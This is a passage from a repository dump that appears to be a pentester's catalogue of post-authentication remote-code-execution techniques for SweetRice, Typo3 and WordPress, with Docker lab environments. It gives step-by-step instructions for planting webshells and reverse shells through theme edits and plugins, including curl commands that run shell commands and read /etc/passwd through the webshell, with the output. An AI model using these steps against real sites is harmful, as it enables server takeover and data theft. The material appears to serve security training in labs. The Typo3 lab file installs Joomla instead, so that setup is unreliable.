https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php 26 | 27 | ### Enjoy your shell 28 | 29 | Now, prepare your listener with netcat (`nc -lvp `) [here we use pwncat] and enjoy your shell: 30 | 31 | ![](./imgs/reverse_shell_received.png) 32 | 33 | ## References 34 | - https://www.sweetrice.xyz/ 35 | - https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/dashboard.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/list_themes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/list_themes.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell_received.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell_received.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/theme_editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/theme_editor.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/visite_site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/imgs/visite_site.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "SweetRice - Modify theme to include PHP code", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.sweetrice.xyz/", 6 | "https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php" 7 | ] 8 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Typo3/README.md: -------------------------------------------------------------------------------- 1 | # Typo3 2 | 3 | TYPO3 is a free and open-source Web content management system written in PHP. It is released under the GNU General Public License. It can run on several web servers, such as Apache, Nginx or IIS, on top of many operating systems, among them Linux, Microsoft Windows, FreeBSD, macOS and OS/2. 4 | 5 | ## Techniques to achieve RCE on Typo3 6 | 7 | ### With admin credentials 8 | 9 | - [Arbitrary deserialisation](./techniques/Arbitrary-deserialisation/README.md) 10 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/README.md: -------------------------------------------------------------------------------- 1 | # Typo3 - Arbitrary deserialisation 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Typo3. 6 | 7 | ## Exploitation 8 | 9 | 10 | 11 | ## References 12 | - https://www.synacktiv.com/publications/typo3-leak-to-remote-code-execution.html -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Typo3 - Arbitrary deserialisation", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.synacktiv.com/publications/typo3-leak-to-remote-code-execution.html" 6 | ] 7 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN apt-get -y -q update; \ 4 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 5 | 6 | RUN service mysql start;\ 7 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 8 | 9 | RUN wget 'https://downloads.joomla.org/cms/joomla4/4-1-3/Joomla_4-1-3-Stable-Full_Package.zip?format=zip' -O /tmp/Joomla.zip ;\ 10 | cd /var/www/html/; rm index.html; unzip /tmp/Joomla.zip 11 | 12 | RUN chown www-data: -R /var/www/ 13 | 14 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 15 | echo "service mysql start" >> /entrypoint.sh ;\ 16 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 17 | chmod +x /entrypoint.sh 18 | 19 | EXPOSE 80 20 | 21 | CMD /entrypoint.sh 22 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Typo3/techniques/Arbitrary-deserialisation/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_typo3_arbitrary_deserialization 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: build 12 | docker run --rm -it -p $(PORT):80 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):80 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/README.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | 3 | WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes. 4 | 5 | ## Techniques to achieve RCE on Wordpress 6 | 7 | ### With admin credentials 8 | 9 | - [Modify theme to include php code](./techniques/Modify-theme-to-include-php-code/) 10 | - [Upload a plugin](./techniques/Upload-a-plugin/) 11 | - [Install File Management Plugin](techniques/Install-FileManagement-Plugin/) 12 | 13 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/README.md: -------------------------------------------------------------------------------- 1 | # Wordpress - Install File Management Plugin 2 | 3 | In case uploading a plugin was not possible for any reason related to custom wordpress configuration or web server configuration ( Maximum upload size ), you might be able to install file management plugin instead and create a new file that will contain your shell code. 4 | 5 | ## Requirements 6 | 7 | - A valid **username and password** of a user with **admin rights** on the Wordpress. 8 | 9 | ## Exploitation 10 | 11 | ### Accessing the dashboard 12 | 13 | Connect with a user with administrative rights on the Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php). 14 | 15 | 16 | ### Installing the plugin 17 | 18 | - Go to "Plugin" --> "Add New" page. 19 | 20 | ![](./imgs/add_new.png) 21 | 22 | - In the next step, type "File Manager" in the search bar and install any of those file managment plugin ( First one recommended ). Active the plugin from the same page after installing it. 23 | 24 | ![](./imgs/Installing_filemanager.png) 25 | 26 | ### Using the plugin 27 | 28 | - On the side bar, you will find the plugin name, Navigate to its page. 29 | 30 | ![](./imgs/plugin_page.png) 31 | 32 | 33 | - Right click on the icon that is related to creating a new file --> Choose plain txt --> change filename extension from ```.txt``` to ```.php``` 34 | 35 | ![](./imgs/creating_new_file.png) 36 | 37 | - Select the created file --> Right click --> Navigate to the code editor. 38 | 39 | ![](./imgs/code_edit.png) 40 | 41 | 42 | - Paste your php webshell code. 43 | 44 | 45 | ``` 46 | 47 | 48 |
49 | 50 | 51 |
52 | 
53 | 
59 |
60 | 61 | 62 | 63 | ``` 64 | 65 | ![](./imgs/paste_phpshellcode.png) 66 | 67 | - Navigate to the main URL of your target with attaching your created filename into it [http://TARGET/NewFile.php](http://TARGET/NewFile.php) 68 | 69 | - Execute the commands. 70 | 71 | ![](./imgs/execute_commands.png) 72 | 73 | ## References 74 | - https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 75 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/Installing_filemanager.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/Installing_filemanager.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/add_new.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/add_new.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/code_edit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/code_edit.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/creating_new_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/creating_new_file.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/execute_commands.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/execute_commands.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/paste_phpshellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/paste_phpshellcode.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/plugin_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/imgs/plugin_page.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Wordpress - Install File Management Plugin ", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985" 6 | ] 7 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | ENV WORDPRESS_VERSION 5.9.3 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 7 | 8 | # Username: db 9 | # Password: db 10 | # Database Name: db 11 | RUN service mariadb start;\ 12 | mysql -u root -e "CREATE DATABASE db; CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget -q https://wordpress.org/wordpress-${WORDPRESS_VERSION}.tar.gz -O /tmp/wordpress.tar.gz ;\ 15 | cd /var/www/html/; rm index.html; tar xf /tmp/wordpress.tar.gz 16 | 17 | RUN chown www-data: -R /var/www/ 18 | 19 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 20 | echo "service mariadb start" >> /entrypoint.sh ;\ 21 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 22 | chmod +x /entrypoint.sh 23 | 24 | EXPOSE 80 25 | 26 | CMD /entrypoint.sh 27 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Install-FileManagement-Plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_wordpress_upload_plugin 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: build 12 | docker run --rm -it -p $(PORT):80 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):80 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/README.md: -------------------------------------------------------------------------------- 1 | # Wordpress - Modify theme to include PHP code 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the Wordpress. 6 | 7 | ## Exploitation 8 | 9 | ### Accessing the dashboard 10 | 11 | Connect with a user with administrative rights on the Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php). 12 | 13 | ![](./imgs/dashboard.png) 14 | 15 | ### Accessing the theme-editor 16 | 17 | Now access the theme-editor in "Appearance / Editor" at [http://TARGET/wordpress/wp-admin/theme-editor.php](http://TARGET/wordpress/wp-admin/theme-editor.php) 18 | 19 | ![](./imgs/theme_editor.png) 20 | 21 | Then edit the theme to add PHP code inside the page: 22 | 23 | ![](./imgs/reverse_shell.png) 24 | 25 | You can find reverse shell PHP payloads here: https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php 26 | 27 | ### Enjoy your shell 28 | 29 | Now, prepare your listener with netcat (`nc -lvp `) and enjoy your shell: 30 | 31 | ![](./imgs/reverse_shell_received.png) 32 | 33 | ## References 34 | - https://wordpress.org/ 35 | - https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/dashboard.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/list_themes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/list_themes.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell_received.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/reverse_shell_received.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/theme_editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/theme_editor.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/visite_site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/imgs/visite_site.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Wordpress - Modify theme to include PHP code", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://wordpress.org/", 6 | "https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#php" 7 | ] 8 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | ENV WORDPRESS_VERSION 4.6.6 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 7 | 8 | # Username: db 9 | # Password: db 10 | # Database Name: db 11 | RUN service mariadb start;\ 12 | mysql -u root -e "CREATE DATABASE db; CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget -q https://wordpress.org/wordpress-${WORDPRESS_VERSION}.tar.gz -O /tmp/wordpress.tar.gz ;\ 15 | cd /var/www/html/; rm index.html; tar xf /tmp/wordpress.tar.gz 16 | 17 | RUN chown www-data: -R /var/www/ 18 | 19 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 20 | echo "service mariadb start" >> /entrypoint.sh ;\ 21 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 22 | chmod +x /entrypoint.sh 23 | 24 | EXPOSE 80 25 | 26 | CMD /entrypoint.sh 27 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Modify-theme-to-include-php-code/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_wordpress_modify_theme 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: build 12 | docker run --rm -it -p $(PORT):80 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):80 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Wordpress - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the Wordpress. 6 | 7 | ## Exploitation 8 | 9 | ### Accessing the dashboard 10 | 11 | Connect with a user with administrative rights on the Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php). 12 | 13 | ![](./imgs/dashboard.png) 14 | 15 | ### Installing the plugin 16 | 17 | Then go on the "Upload plugin" page. 18 | 19 | ![](./imgs/upload_wp_term.png) 20 | 21 | Now, upload the plugin [wpterm](./wpterm.1.1.9.zip) to get a webshell plugin into Wordpress admin console. 22 | 23 | ![](./imgs/upload_wp_term.png) 24 | 25 | ### Using the plugin 26 | 27 | To use the webshell plugin, just access this page http://TARGET/wordpress/wp-admin/tools.php?page=wpterm 28 | 29 | ![](./imgs/wpterm_webshell.png) 30 | 31 | ## References 32 | - https://wordpress.org/plugins/wpterm/ 33 | - https://github.com/p0dalirius/Wordpress-webshell-plugin -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/WPterm_plugin.md: -------------------------------------------------------------------------------- 1 | # Wordpress - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the Wordpress. 6 | 7 | ## Exploitation 8 | 9 | ### Accessing the dashboard 10 | 11 | Connect with a user with administrative rights on the Wordpress at [http://TARGET/wp-login.php](http://TARGET/wp-login.php). 12 | 13 | ![](./imgs/dashboard.png) 14 | 15 | 16 | ### Step 1: Upload the webshell plugin 17 | 18 | First, login with admin rights on the WordPress website and go to "_Plugins --> Add New_" page, at http://TARGET/wordpress/wp-admin/plugin-install.php, and click on "Upload Plugin": 19 | 20 | ![](./imgs/plugin_add_new.png) 21 | 22 | Upload the plugin, and click on "_Activate the plugin_": 23 | 24 | ![](./imgs/activate_plugin.png) 25 | 26 | ### Step 2.1: Executing commands 27 | 28 | You can now execute commands by sending a GET or POST request to http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php with `action=exec&cmd=id`: 29 | 30 | ```sh 31 | $ curl -X POST 'http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=id" 32 | {"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"} 33 | ``` 34 | 35 | You can also access it by a GET request from a browser: 36 | 37 | ![](./imgs/exec_code_web.png) 38 | 39 | ### Step 2.2: Downloading files 40 | 41 | You can also download remote files by sending a GET or POST request to http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php with `action=download&cmd=/etc/passwd`: 42 | 43 | ```sh 44 | $ curl -X POST 'http://TARGET/wordpress/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=download&path=/etc/passwd" -o- 45 | root:x:0:0:root:/root:/bin/bash 46 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 47 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 48 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 49 | sync:x:4:65534:sync:/bin:/bin/sync 50 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 51 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 52 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 53 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 54 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 55 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 56 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 57 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 58 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 59 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 60 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 61 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 62 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 63 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 64 | mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 65 | ``` 66 | 67 | You can also download a remote file from a browser with a GET request : 68 | 69 | ![](./imgs/download_file_web.png) 70 | 71 | ### Step 3: The interactive console 72 | 73 | When your webshell is active, you can now use the interactive [console.py](console.py) to execute commands and download remote files. 74 | 75 | https://user-images.githubusercontent.com/79218792/169876672-7ecd50a4-21f8-47d3-a575-ff2b81b5ec22.mp4 76 | 77 | ## References 78 | - https://wordpress.org/plugins/wpterm/ 79 | - https://github.com/p0dalirius/Wordpress-webshell-plugin -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/activate_plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/activate_plugin.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/dashboard.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/download_file_web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/download_file_web.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/exec_code_web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/exec_code_web.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/installing_plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/installing_plugin.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/list_of_installed_plugins.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/list_of_installed_plugins.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/login.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/plugin_add_new.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/plugin_add_new.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_plugin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_plugin.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_wp_term.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/upload_wp_term.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/wpterm_webshell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/imgs/wpterm_webshell.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Wordpress/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Wordpress - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://wordpress.org/plugins/wpterm/", 6 | 